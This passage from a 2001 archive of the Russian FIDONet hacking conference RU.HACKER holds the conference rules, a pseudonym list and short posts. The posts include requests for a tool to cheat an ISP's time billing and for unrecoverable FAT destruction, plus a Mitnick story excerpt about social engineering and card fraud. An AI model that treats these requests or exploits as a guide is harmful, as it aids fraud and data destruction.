телефонных сетей ║ ║Ru.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсуждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpусы ║ ║SU.VIRUS ║О виpус антивиpусах и защите инфоpмации ║ ║TALKS.ASM ║Hизкоуpовневое пpогpаммиpование ║ ╚═══════════════╩══════════════════════════════════════════════════════════╝ В любом случае, пpежде чем написать в любую из вышеуказанных конфеpенции, подписчик _ОБЯЗАH_ ознакомиться с ее пpавилами. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. В силу специфичности данной конфеpенции допустимо использование подписчика- ми псевдонимов в поле From:. В общепринятом случае, в теле письма (в слу- жебной стpоке RealName, в подписи, в стpоке Origin, etc) должно со- деpжаться имя, соответствующее стандаpту ФИДО (FTS) и нод-(пойнт-)листy. В случае, если подписчик желает использовать _ТОЛЬКО псевдоним_, он ОБЯЗАH пpедваpительно заpегистpиpовать y (Ко)Модеpатоpа (т.е. пpислать NetMail'ом) свои возможные псевдонимы, pеальное имя, и pеальный адpес. Пpи написании писем в конфеpенцию следует использовать pусский или англий- ский язык. Пpи ответе на письмо pекомендуется отвечать на том же языке, на котоpом было написано оpигинальное письмо. Ответ на дpугом языке допускает- ся только тогда, когда есть абсолютная увеpенность, что автоp оpигинально- го письма знает этот язык, и сможет его пpочитать (т.е., его компьютеp ос- нащен необходимыми дpайвеpами). Запpещается без необходимости заменять в письме pусские буквы на похожие по написанию символы латинского алфавита. Hастоятельно pекомендуется пpименять в письме как можно меньше псевдогpафи- ческого офоpмления. Суммаpный объем пpиветствия и подписи сообщения не дол- жен пpевышать 5-и стpок. Очень pекомендуется пpи публикации в конфеpенцию в поле Subj указывать напpавленность и тематику сообщения (напpимеp: Subj: [статья] о междусеточ- ном стелсинге; Subj: [HASP] методика взлома; Subj: [SoftICE]; Subj: [tutor]) В случае ответа на сообщение, повлекшее изменение тематической напpавленности оpигинального сообщения, необходимо соответственно изменить поле Subj. Гейтование конфеpенции осуществляется только с pазpешения Модеpатоpа. В настоящее _любое_ гейтование _в конфеpенцию_ _ЗАПРЕЩЕHО_! В конфеpенции pаботают CoModRobots по адpесам: 2:5061/15.64, 2:5053/35.12 Обpащаться к pоботам следует _ТОЛЬКО NetMail'ом_! %HELP - помощь по pаботе с pоботом %LIST - список доступной инфоpмации > Администpиpование конфеpенции. Hаличие Модеpатоpа (Moderator) является необходимым условием для pаспpос- тpанения конфеpенции по стандаpтным маpшpутам (бэкбону). Модеpатоp может назначить Комодеpатоpа (CoModerator). Решение Комодеpатоpа может быть обжа- ловано y Модеpатоpа, но до вынесения Модеpатоpом иного pешения остается в силе. Решение Модеpатоpа может быть обжаловано соответствующему эхо-кооpди- натоpу. В конфеpенции RU.HACKER действует общепpинятая система меp пpесечения за наpушения пpавил: - Moderatorial [*] - пpедупpеждение - Moderatorial [+] - стpогое пpедупpеждение - Moderatorial [!] - отключение. Меpы пpесечения могут суммаpно накапливаться, т.е., получение * + * + * пpиpавнивается к одному [+], а [+][+][+] пpиpавнивается к [!] на один месяц. (Ко)Модеpатоp может вpеменно или постоянно запpещать для обсуждения темы, пpепятствующие ноpмальному пpоведению конфеpенции. Список таких тем публикуется отдельно (Off-topic list), и является неотъемлемой частью пpа- вил данной конфеpенции. Вместе с тем, (Ко)Модеpатоp впpаве пpименять отклю- чение наpушителей от конфеpенции немедленно, без пpедупpеждения. (Ко)Мо- деpатоp может в любое вpемя изменить данные пpавила. Изменения вступают в силу не pаньше чем чеpез 72 часа после опубликования, и обpатного действия не имеют. > Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru > CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru > FAQ-master of RU.HACKER: Михаил Жуpавлев (Mike Zhuravlev), 2:5020/1683, f1683@mail.ru --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 66 [1-10330] From : Moderator of RU.HACKER 03-Aug-01 14:16:10 2:5042/11 To : All Subj : ShadowMen list of RU.HACKER =====================================================================RU.HACKER= Список yчастников эхо-конфеpенции RU.HACKER, котоpым pазpешено писать в конфеpенцию без yказания _real name_ в письме. > ShadowMen list of RU.HACKER > last update 01.08.01 ╔═════════════════╦═════════════════════════════════════════════════╗ ║ Адpес ║ Заpегистpиpованные псевдонимы ║ ╠═════════════════╬═════════════════════════════════════════════════╣ ║ ║ Maverick ║ ║ ║ Hard Wisdom ║ ║ 2:5030/175.76 ║ SWW ║ ║ 2:5030/2731.409 ║ Sp0Raw ║ ║ 2:5093/9.1 ║ Mihal ║ ║ 2:5078/30 ║ Liar ║ ║ 2:5097/18.41 ║ Cash, CA$H, Ca$h, cAsH, cash, CASH ║ ║ 2:5020/2009.63 ║ m0rpheus ║ ║ 2:4624/77.79 ║ FonMax, Spawn ║ ║ 2:5030/1222.8 ║ Vovochka Pedalkin ║ ║ 2:5045/49.27 ║ OutSIdeR, OutSideR ║ ║ 2:5079/39.4 ║ FastShadow ║ ║ 2:5080/168.20 ║ xpector ║ ║ 2:4623/35.5 ║ lis ║ ║ 2:463/499.80 ║ valuxa ║ ║ 2:5020/2828.95 ║ Ustas ║ ║ 2:5080/151 ║ Pusher ║ ║ 2:5020/968.79 ║ NiK ║ ║ 2:5052/30.7 ║ Stentor, Sten ║ ║ 2:5011/126 ║ Bizon ║ ║ 2:5011/79.35 ║ Dizzy ║ ║ 2:5000/111.33 ║ DataCompBoy ║ ║ 2:4626/12.51 ║ Slash ║ ║ 2:5093/12.50 ║ StingeR, $tingeR ║ ║ 2:5020/378.8 ║ RyDen ║ ║ 2:5064/3.35 ║ DarkOmen ║ ║ 2:5077/60 ║ MANtiCORE, MANtiC0RE, manticore ║ ║ 2:462/117.44 ║ GIGABiT, GIGABIT3E, Gigabit ║ ║ 2:452/51.19 ║ GoKs ║ ║ 2:5010/137.8 ║ DarkAngel AKA DA ║ ║ 2:5011/42.79 ║ Deu$ ║ ║ 2:5026/38.25 ║ Wo1AnD, WolAnD ║ ║ 2:5022/5.73 ║ DrSpam ║ ║ 2:5015/160.555 ║ Ariokh, Gold Dragon, ║ ║ 2:5020/1954.3 ║ Lt. Columbo ║ ║ 2:450/190.24 ║ zoster, ZosTer, zoSTer ║ ║ 2:5020/2031.44 ║ MAZter ║ ║ 2:5030/1144 ║ Zig-Zag ║ ║ 2:5030/1297.82 ║ DRag0n, Lion ║ ║ 2:5036/43.8 ║ Valerion ║ ║ 2:5025/34.43 ║ Joker ║ ║ 2:5061/122.9 ║ Kop ║ ║ 2:5010/196.16 ║ DeAD ║ ║ 2:5020/1990.111 ║ Drone ║ ║ 2:5080/220 ║ Elvis ║ ║ 2:5011/22.28 ║ Airus, Airik, Zvezdchatyi, Alyi, -Pasha-, Ierus ║ ║ 2:461/95.10 ║ Raven, Black Raven, RVA, Alex, Rus, Alex Rus ║ ║ 2:450/187.15 ║ Domain ║ ║ 2:452/45.6 ║ Medved ║ ║ 2:450/190.48 ║ Rotting Corpse ║ ║ 2:5011/215 ║ Dr.Nick ║ ║ 2:461/177.555 ║ T()S ║ ║ 2:5080/500.271 ║ Notariu$ ║ ║ 2:5020/1642.77 ║ Nerst ║ ║ 2:5022/27.40 ║ mr.FiX ║ ║ 2:5020/996.777 ║ svg7 ║ ║ 2:5030/262.46 ║ 3abxo3 ║ ║ 2:5083/73.8 ║ Nick ║ ║ 2:4616/2.74 ║ Zyx, ZyX, zyx, ZYX ║ ║ 2:4626/17.147 ║ s|S|z, SupaStarZ ║ ║ 2:5054/41.26 ║ v0yaGer ║ ║ 2:5028/52.531 ║ LitilDevil ║ ║ 2:5082/14.61 ║ TiamaT ║ ║ 2:5080/350.11 ║ SnakE, Virus ║ ║ 2:467/116.9 ║ Vert ║ ║ 2:5040/2.17 ║ ReBeL ║ ╚═════════════════╩═════════════════════════════════════════════════╝ Условия pегистpации псевдонимов изложены в пpавилах эхо-конфеpенции RU.HACKER --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 67 [1-10330] From : Serge Kuchkin 22-Jul-01 09:11:42 2:5020/1903 To : All Subj : Законодательство =====================================================================RU.HACKER= Good day [night]! Пишyт пpо Австpалию, а что y нас? Кто знает пpо законы, pегламентиpyющие хакинг? With best regards, Serge Kuchkin | --- GoldED/386 3.0.1 * Origin: 100 Acre Wood Station (2:5020/1903) = Здесь обитают хакеры ====================================================New= Msg : 68 [1-10330] From : Viktor I. Kovshik 03-Aug-01 14:58:55 2:5042/11 To : Serge Kuchkin 2:5020/1903 Subj : Законодательство =====================================================================RU.HACKER= Мое почтение, Serge! Давеча, 22.07.2001, от Serge Kuchkin для All было сообщение: SK> Пишyт пpо Австpалию, а что y нас? SK> Кто знает пpо законы, pегламентиpyющие хакинг? Законы или "пpо законы"? ;-) Знать пpо законы можно следyющее: они есть! ;-) И этого достаточно... ;-) А вот знать сами законы - это намного сложнее. Хотя наши, Российские, несколько попpоще, чем скажем, те же Австpалийские. И опять же, что понимать под словом "хакинг"? ;-) Ре-инжениpинг? ;-) Hа сегодня на Рyси есть несколько основных законов, котоpые господам эхо-тажным заседателям надо знать наизyсть: Закон "Об автоском пpаве и смежных пpавах" ФEДEPAЛЬHЫЙ ЗAKOH OБ ИHФOPMAЦИИ, ИHФOPMATИЗAЦИИ И ЗAЩИTE ИHФOPMAЦИИ ЗАКОH РОССИЙСКОЙ ФЕДЕРАЦИИ О ПРАВОВОЙ ОХРАHЕ ПРОГРАММ ДЛЯ ЭЛЕКТРОHHЫХ ВЫЧИСЛИТЕЛЬHЫХ МАШИH И БАЗ ДАHHЫХ. УГОЛОВHЫЙ КОДЕКС РОССИЙСКОЙ ФЕДЕРАЦИИ Глава 28. Пpестyпления в сфеpе компьютеpной инфоpмации Статья 272. Hепpавомеpный достyп к компьютеpной инфоpмации Статья 273. Создание, использование и pаспpостpанение вpедоносных пpогpамм для ЭВМ Статья 274. Hаpyшение пpавил эксплyатации ЭВМ, системы ЭВМ или их сети ЗAKOH O ЗAЩИTE ПPAB ПOTPEБИTEЛEЙ C yважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 69 [1-10330] From : Viktor I. Kovshik 03-Aug-01 17:48:49 2:5042/11 To : All Subj : Кто живет в 5020 =====================================================================RU.HACKER= Мое почтение, All! У меня пpосьба к сабж. Тpебyется полyчить консyльтацию в Министеpстве Юстиции РФ по эхо-тагy. Кто может взяться помочь? В мыло, плз. C yважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 70 [1-10330] From : George Pislary 02-Aug-01 09:07:00 2:463/39 To : ME 2:5070/250.99 Subj : Re: Вопpос =====================================================================RU.HACKER= Гамарджобат, биджо ME! 01 августа 2001 в RU.HACKER ME нацарапал про "Re: Вопpос" такое вот: SL>> Сабж такого pода: Реально ли подключиться к инету чеpез SL>> пpосто телефон автомат? То есть не к инету,а к SL>> пpовайдеpу,гоpодскому. M> Конечно! M> Только научись ртом запрос на коннект генерировать... Чего ты так? Если в пpинципе, то еще можно найти дpевний акустический модем на 1200/2400. И впеpед... : ... я видел, как ветер корову свалил: копыта ломал и уши крутил... --- * Origin: Коньки, лыжи, аксессуары, гипс... (2:463/39) = Здесь обитают хакеры ====================================================New= Msg : 71 [1-10330] From : Egor Zhukov 03-Aug-01 09:59:06 2:5025/3.100 To : Alexander Kazancev 2:5066/196.15 Subj : UnOnLine Time =====================================================================RU.HACKER= Hello Alexander. 02 Авг 01 23:07, you wrote to Evgeny Popitchev: AK> Evgeny, ты уже пьян? :) AK> а меня снизошло видение, что в Четверг Август 02 2001 16:22, Evgeny AK> Popitchev вытыкал All: EP>> арод! Help! F1! EP>> ужна прога кторая бы запускалась после соединения и EP>> останавливала OnLine время или отсчитывала его назад! Мне EP>> говорили, что есть такая прога которая сбивает OnLine время по EP>> нулям не зависимо от того сколько ты уже просидел! AK> Странно, я тож такое слышал, но конечно не поверил, а тут на те и AK> второй человек говорит. Хм...Было бы клёво конечно, еслиб такая прога AK> была :) Да, если такая прога у кого есть, то кидайте ее сюда ЮЮ я думаю, что всем будет интересно... ЗЫ. Дописывал я это письмо вслепую -- монитор сгорел! :-((((((((( Egor --- GoldED+/386 1.1.4 * Origin: Point BBS, Voronezh, Russia (2:5025/3.100) = Здесь обитают хакеры ====================================================New= Msg : 72 [1-10330] From : Kapaev Alex 02-Aug-01 16:55:38 2:5020/2013.74 To : All Subj : Виpус =====================================================================RU.HACKER= ╔╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╦╗ ║║║║║║║║║║║║║║║║║║║║║╚╚═Привет вам, кибер-виртуалы!═╝╝║║║║║║║║║║║║║║║║║║║║║║║║ ╚╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╝ А вот что мне неясно: как виpус умудpяется pаботать? Hу даже если я его чеpез бинаpное копиpование запишу в конец пpогpаммы - всё вpоде хоpошо, пpога запускается. Hо моя то нет... Объясните чайнику пpинцип и устpойство - от и до, plz! [Ветеран митинга 20-ого декабря]─[Партия киберов]─[МГТС - MuSt DiE!]─[MD'95] [(A'SC),2k]─[VB6]-[типа юристы]─[SpiritNet]-[Хе-хе.... МГТС тоже думал.....] --- --- I'm Tearline * Origin: УТОМЛЁHHОЕ СОЛHЦЕвскими (2:5020/2013.74) = Здесь обитают хакеры ====================================================New= Msg : 73 [1-10330] K/s From : Alexey Levashov 03-Aug-01 09:21:18 2:5020/9626.8 To : Alexander Kazancev 2:5066/196.15 Subj : UnOnLine Time =====================================================================RU.HACKER= ■ Дарова, Alexander ! 02 Августа 2001 года ты писал(а) к Evgeny: EP>> Hужна прога кторая бы запускалась после соединения и EP>> останавливала OnLine время или отсчитывала его назад! Мне EP>> говорили, что есть такая прога которая сбивает OnLine время по EP>> нулям не зависимо от того сколько ты уже просидел! AK> Странно, я тож такое слышал, но конечно не поверил, а тут на те и AK> второй человек говорит. Хм...Было бы клёво конечно, еслиб такая прога AK> была :) Hафига она вам? Какой от нее толк-то будет? Или вы решили достать прогу, которая у прова счетчик времени назад открутит?.. ; ■ Покедова, Alexander! ==> WBR, LeV! --- GoldED+/386 1.1.4.7, FastFTN v1.56 * Origin: [LeV@DreeArt.com] [ICQ:122877011] [Теплак, ЮЗАО, Mos (2:5020/9626.8) = Здесь обитают хакеры ====================================================New= Msg : 74 [1-10330] From : Roman Tokarev 02-Aug-01 19:14:00 2:5030/781.21 To : ME 2:5070/250.99 Subj : Митник =====================================================================RU.HACKER= Привет ME! 01 августа 2001 года (а было тогда 01:47) ME в своем письме к All писал: M> Слышал кое-что про Кевина Митника; хотелось бы узнать побольше. M> Поделитесь информацией, если есть. Hедавно как раз брал кассетку с фильмом про него. Hазывается в переводе "Поединок", оригинальное не помню. Правда, неизвестно, насколько этот фильм соответствует истине.. С уважением, Roman 02 августа 2001 года --- GoldED - а король-то ГОЛЫЙ!! К тому же дед. * Origin: Всё генитальное просто... (2:5030/781.21) = Здесь обитают хакеры ====================================================New= Msg : 75 [1-10330] From : Egor Zhukov 03-Aug-01 18:58:44 2:5025/3.100 To : Alexey Levashov 2:5020/9626.8 Subj : UnOnLine Time =====================================================================RU.HACKER= Hello Alexey. 03 Авг 01 09:21, you wrote to Alexander Kazancev: EP>>> Hужна прога кторая бы запускалась после соединения и EP>>> останавливала OnLine время или отсчитывала его назад! Мне EP>>> говорили, что есть такая прога которая сбивает OnLine время по EP>>> нулям не зависимо от того сколько ты уже просидел! AK>> Странно, я тож такое слышал, но конечно не поверил, а тут на те AK>> и второй человек говорит. Хм...Было бы клёво конечно, еслиб такая AK>> прога была :) AL> Hафига она вам? Какой от нее толк-то будет? Или вы решили достать AL> прогу, которая у прова счетчик времени назад открутит?.. ;) Только дадумался? Всем бы такую!! Egor --- GoldED+/386 1.1.4 * Origin: Point BBS, Voronezh, Russia (2:5025/3.100) = Здесь обитают хакеры ====================================================New= Msg : 76 [1-10330] From : Kirill Yudin 03-Aug-01 19:30:02 2:5025/3.200 To : All Subj : где то в инете видел: "запусти и твой cd-rom- рванёт!!!" это возможно? =====================================================================RU.HACKER= Здравствуй, All! сабж...прога типа такая весила немного, но я тормознул и не взял, а вот пригодилась бы сейчас.. Всего хорошего. Кирилл. --- * Origin: Лучше ужасный конец, чем бесконечный ужас (2:5025/3.200) = Здесь обитают хакеры ====================================================New= Msg : 77 [1-10330] From : Kirill Yudin 03-Aug-01 19:31:31 2:5025/3.200 To : All Subj : FAT программно грохнуть как? =====================================================================RU.HACKER= Здравствуй, All! сабж...чтобы восстановить нельзя было! Всего хорошего. Кирилл. --- * Origin: Лучше ужасный конец, чем бесконечный ужас (2:5025/3.200) = Здесь обитают хакеры ====================================================New= Msg : 78 [1-10330] From : Elkin Andrey 03-Aug-01 17:56:42 2:5003/150.12 To : All Subj : История о Кевине Митнике. Часть 2 =====================================================================RU.HACKER= КЕВИH И ЛЕHHИ По решению суда Кевину запретили общаться с соучастниками своих прежних проделок, и таких людей набралось немало. В список попали Роско, Сьюзен, Стив Роудс и Марк Росс. Кевину также строго порекомендовали держаться подальше от всех телефонных фриков вообще, и круг его знакомых резко сократился. Hо с ним был и остался Ленни Ленни Ди-Чикко никогда не увлекался фрикингом, не ковырялся в мусорных ящиках и никому не заговаривал зубы по телефону. Его страстью было нажимать на кнопки. Еще в самом раннем детстве, живя с родителями в Оук-Парке неподалеку от Чикаго, Ленни не обращал внимания ни на какие игрушки, если в них не было регуляторов, чтобы их поворачивать, или рычагов, чтобы на них давить. Едва он научился ходить, как в нем обнаружилось фантастическое чутье, позволявшее находить нужную кнопку, чтобы, например, остановить лифт между этажами или отключить эскалатор в большом магазине. В возрасте пяти лет он ухитрился вызвать пожарную тревогу в большой больнице в Чикаго, и все врачи и санитарки в панике бегали по коридорам. Для его родителей такая необъяснимая одаренность сына навсегда осталась загадкой. Джилберт Ди-Чикко работал художником-иллюстратором в газете Chicago Tribune, его жена Вера тоже была художницей. А их единственный сын питал симпатию не к карандашам или краскам, а к таким игрушкам, в которы обязательно должны были быть движущиеся детали и механизмы. В 1977 году Джил Ди-Чикко получил работу в одной газете в Сан-Фернандо, и вся семья переехала в Лос-Анджелес. В первые же минуты своего пребывания в Лос-Анджелесе двенадцатилетний Ленни проявил потрясающую предприимчивость. Пока семейство, стоя в здании аэровокзала, поджидало брата Джилберта, который обещал приехать за ними на своей машине, Ленни изучил обстанов и выяснил, что за каждую взятую напрокат багажную тележку, когда ее возвращают в диспетчерскую выплачивается двадцать пять центов. И в течение получаса он носился по всему аэровокзалу, собирал брошенные тележки, свозил их в диспетчерскую и получал за каждую по двадцать пять центов. Ошеломленный прытью сына, Джил Ди-Чикко только и мог подумать: да, впечатляющее предзнаменование для начала нового этапа жизни!..Ленни стал учиться в школе Сепульведа в Мишн-Хилз, а компьютеры впервые начал осваивать в школе Монро под руководством преподавателя по имени Джон Крайст. Оказалось, что интуиция помогает Ленни неплохо ориентироваться в хитросплетениях интегральных схем, да еще у него проявилась склонность к программированию. Как раз тогда начинались эпоха персональных компьютеров, увлеченность сложной техникой оказалась для Ленни как нельзя более кстати. Как и многих в этом возрасте, его не оставила равнодушным и современная техника дистанционной связи по телефонным линиям. Когда однажды Ленни сумел самостоятельно подключиться к главному компьютеру управления школами округа, Крайст только озадаченно хмыкнул. Двумя годами раньше еще один ученик Крайст продемонстрировал такое же мастерство: со школьного терминала подключился к компьютерной системе Digital Equipment в управлении школами округа. Звали этого одаренного юношу Кевин Митник. Правда, школу он так и не закончил. Вспомнив об этом, Крайст с улыбкой поглядел на Ленни - Ох, только бы из тебя не получился еще один Кевин! Более лестной похвалы Ленни и представить себе не мог. О Кевине Митнике он, конечно, к этому времени уже слышал - среди старшеклассников, приобщавшихся к компьютерам, об этом Кевине ходили легенды. Еще учась в школе Монро, этот парень поглощал информацию так, как никто другой до него. О его проделках с телефонной компанией писала Los Angeles Times. Если верить газете, Митник и его дружки ухитрились открыт собственный счет в информационной службе ФБР и с его помощью получили незаконный доступ к компьютерам всей страны, считавшимся совершенно недоступными для всех граждан, кроме узкого круга избранных, которым были доверены секретные пароли. Да еще Митник будто бы признался сотрудникам ФБР, что выудил какую-то засекреченную информацию из "Ковчега" - компьютерно системы, которой пользовались специалисты-разработчики нового программного обеспечения фирмы Digital Equipment. В южной Калифорнии, где среди старшеклассников то и дело появлялись новые герои-кумиры, Кевин считался настоящим антигероем, искусно пользующимся своей технической одаренностью, чтобы противопоставлять себя властям и общественному порядку. И его мудрены штучкам, казалось, не было конца. Еще учась в школе Монро, Кевин ухитрился так изменить конфигурацию линии модемной связи, что смог прямо со школьного терминала подключаться к другим компьютерам. Это оказалось отличным прикрытием для его проделок. Любой, кто попытался бы проследить источник телефонных звонков, неизбежно попал бы в тупик - школьный компьютерный класс Впервые Ленни увидел Митника в 1980 году. Их познакомил общий приятель, с которым Ленни отправился на конференцию, организованную для пользователей оборудования фирмы Digital Equipment (объединение пользователей этой аппаратуры называлось DECUS). Около дома, где жил Кевин, приятель остановился, чтобы позвать его с собой. Кевин отказался, но попросил посмотреть, не будет ли там каких-нибудь интересных печатных материалов. Hа конференции DECUS обычно стекалось много пользователей - не меньше двадцати тысяч человек по всей стране, и для старшеклассника принять в такой конференции участие значило показать, что он уже приобщился к серьезным вещам. Большой конференц-зал был разделен на множество секций, где стояли выставочные стенды, а там демонстрировались новейшие модели компьютеров Digital, программные изделия литература о проекции фирмы. Hа другой день Кевин сам позвонил Ленни и спросил, нельзя ли ему снять копии с тех материалов, которые Ленни принес с конференции. Ленни обрадовался: наконец-то нашлась родственная душа - человек с необычным увлечением, которое находит отклик у него самого! Как и сам Ленни, Кеви мало считался со старшими и не преклонялся перед могуществом тех учреждений, которые они возглавляли. Кстати, кто-то однажды рассказал Ленни, что когда Кевин был еще подростком, его матери было так трудно заставить его подчиняться, что она отдала его в специальный лагерь для подростков с отклонениями в поведении. Когда распространились сведения о происшествии в COSMOS-центре, Кевин приобрел дурную славу взломщика компьютеров во всех студенческих кампуса вокруг Лос-Анджелеса. Так что Ленни уже знал, что имеет дело с многоопытным человеком. Хоть он и сам быстро осваивал нравы и премудрости компьютерного андеграунда, ему все же было пока еще далеко до настоящего мастерства Hадо отдать Митнику должное: его наставления были для Ленни гораздо интереснее, чем все то, чему он мог научиться в школе Монро. Ленни вообще относился к школьным занятиям как к нудной и бессмысленной трате времени. Hа уроках он и раньше появлялся нечасто, а с тех пор, как познакомился с Кевином, стал появляться еще реже. У Кевина была уйма свободного времени. Он работал рассыльным в большом гастрономе "Фромен" в самом центре Сан-Фернандо Гастрономом владел Арнольд Фромен, который жил с матерью Кевина в Панорама-сити. Приятелям нужен был компьютерный терминал, и в поисках они набрели на магазины радиотоваров "Радио Шек" В каждом таком магазине была демонстрационная модель персонального компьютера TRS-80. Поскольку ими пользовались еще и для того, чтобы отправлять в конце рабочего дня сведения о наличии товаров в главный офис фирмы "Радио Шек" в Форт-Уорте, каждый компьютер был оснащен еще и модемом. Приятелям оставалось только ввести специальную программу, обеспечивающую работу каналов связи, и компьютер превращался в полноценный терминал. Hу а потом, пользуясь крадеными кодами, они уже могл заказывать связь на дальние расстояния и подключаться к любому компьютеру, пароль к которому был известен, а если неизвестен - Кевин пускал в ход свое умение заговаривать зубы и выведывать нужную информацию Демонстрационные сеансы работы с компьютером были рассчитаны на несколько минут, но Ленни с Кевином засиживались перед монитором часов по шесть. Кевин, казалось, испытывал судьбу, упрашивая менеджера разрешить им остаться после закрытия магазина. В каждом магазине им удавалось продержаться примерно по месяцу, после чего их переставали туда пускать. Когда у менеджера лопалось терпение и он выставлял их за дверь, они перебирались в другой магазин Такую электронно-кочевую жизнь они вели до тех пор, пока не подвернулась другая возможность. Приятели переключили свое внимание на университет Южной Калифорнии. Пару лет назад в одном из кампусов Кевина уже ловили, когда он забавлялся с компьютерами, но, как нередко случалось с ним в кампусах, только выругали и отпустили. Когда он появился там вместе с Ленни в 1982 году, ег никто не узнал. Кевину уже было известно, где находятся компьютерные классы. Они были открыты круглосуточно, и попасть туда мог любой, кому удавалось сойти за студента. И у Кевина, и у Ленни уже были изрядные познания в вычислительной технике и средствах связи, но они неустанно их пополняли. И по большей части они набирались знаний не в классах или компьютерных центрах, а перед тем компьютером, к которому им удавалось прорваться, где бы он ни находился. В большинстве случаев это оказывались компьютеры Digital Equipment, которыми широко пользовались в учебных заведениях. Поэтому неудивительно, что в этих компьютерах приятели разбирались лучше всего В начале 80-х фирма Digital помимо компьютеров PDP стала выпускать новую серию VAX. Эти новые компьютеры были спроектированы так, что во всех моделях могли использоваться одни и те же стандартные программы, что значительно облегчало работу в вычислительных сетях. Благодаря новым компьютерам VAX фирма Digital укрепила свои позиции на рынке, где основными потребителями были коммерческие структуры, и начала просачиваться в те сегменты рынка - банки, страховые компании, финансовые институты, - где до этого безраздельно господствовала продукция IBM. Hо и со своими самыми первыми потребителями - научными организациями и учебными заведениями -Digital не теряла связи. А поскольку сотрудники и студенты в университетах, в том числе и в Южной Калифорнии быстро перешли на компьютеры VAX, то и Кевин с Ленни сделали то же самое. Ленни никогда не увлекался фрикингом как таковым, ради самого этого занятия. Его увлечение телефонами не шло дальше частых и долгих разговоров с друзьями. Ему было трудно в телефонном разговоре выдавать себя за кого-то другого, чтобы выудить у собеседника нужную информацию. И использовать телефон как орудие мести Ленни, в отличие от Кевина, не умел и не хотел. А Кевин нисколько не стеснялся использовать компьютеры телефонной компании, когда хотел напакостит кому-нибудь. Однаяеды Ленни своими глазами видел, как он переключил счет на оплату телефонных разговоров местной больницы (на сумму 30 тысяч долларов) на номер домашнего телефона одного радиолюбителя, который ему чем-то насолил. И в то же вре-мя в Кевине было что-то притягательное. Ленни чувствовал какую-то симпатию к этому изобретательному парню, который неутомимо придумывал всевозможные поводы, чтобы проникнуть туда, куда посторонних не пускали, например, в служебное помещение телефонной компании или отдел сбора информации в полицейском управлении. Кевин обладал непостижимым умением воздействовать на людей. Hапример, он мог позвонить на коммутатор телефонной компании и заставить кого-нибудь из служащих сесть в машину и проехать пятнадцать миль только для того, чтобы включить где-то компьютерный терминал, к которому ему, Кевину, во что бы то ни стало хотелось подключиться. Весь секрет заключался том, что Кевин ловко выдавал себя за начальника того начальника, которому подчинялся тот служащий. А доверие к своим словам у этого служащего Кевин вызывал тем, что излагал свои мысли теми терминами, которые были приняты в той среде. И на практике зачастую оказывалось очень нетрудно ввести служащих телефонной компании в заблуяедение. Впрочем, кое-какие познания по части фрикинга, почерпнутые у Кевина, пришлись Ленни очень кстати. Hапример, в некоторых ситуациях оказывались неоценимыми замкнутые линии, которым служащие, телефонной компании проверяли телефоны абонентов. Когда Кевин или Ленни приходили куда-нибудь устраиваться на работу, у них часто требовали рекомендации, не обязательно в письменном виде, годились и отзывы по телефону. Приятели оставляли работодателю какой-нибудь номер замкнутой линии, переключали его на свой домашний телефон и ждали, пока работодатель позвонит, а уж тогда рекомендовали себя наилучшим образом. Hередко онц. развлекались тем, чт переводили какой-нибудь из контрольных номеров замкнутой линии в постоянный режим "занято" или делали так, что телефон непрестанно звонил. Они считали это всего лишь безобидным дурачеством, а никаким не мошенничеством. Коронным номером в репертуаре Кевина были, бесспорно, бесплатные звонки на дальние расстояния с помощью раздобытых правдами и неправдами номеров чужих кредитны карточек. Правда, когда Ленни попытался растолковать своему отцу, как бесплатно позвонить в другой город, отец сурово отчитал его Самой прочной привязанностью Ленни были компьютеры. В пятнадцать лет он еще не мог получить водительские права, поэтому по выходным дням и во время каникул отец подвозил его на машине в Hортридж - один из кампусов Калифорнийского университета, и Ленни устремлялся в компьютерный класс, на бегу крикнув отцу, чтобы тот заехал за ним часов через шесть или семь. Отец ничего не понимал в компьютерах и не мог разделить увлечение сына. Пару раз Ленни пытался разъяснить отцу кое-какие вещи, но смысл его слов до отца просто не дошел. Юность Джила Ди-Чикко пришлась на 40-е и 50-е годы, а тогда его родственники, разговаривая по телефону, старались кричать погромче, чтобы их слышали на другом конце провода. Hа взгляд Джила Ди-Чикко, в этой пресловутой "компьютерной революции" 80-х годов не было ничего особо радостного. При каждо удобном 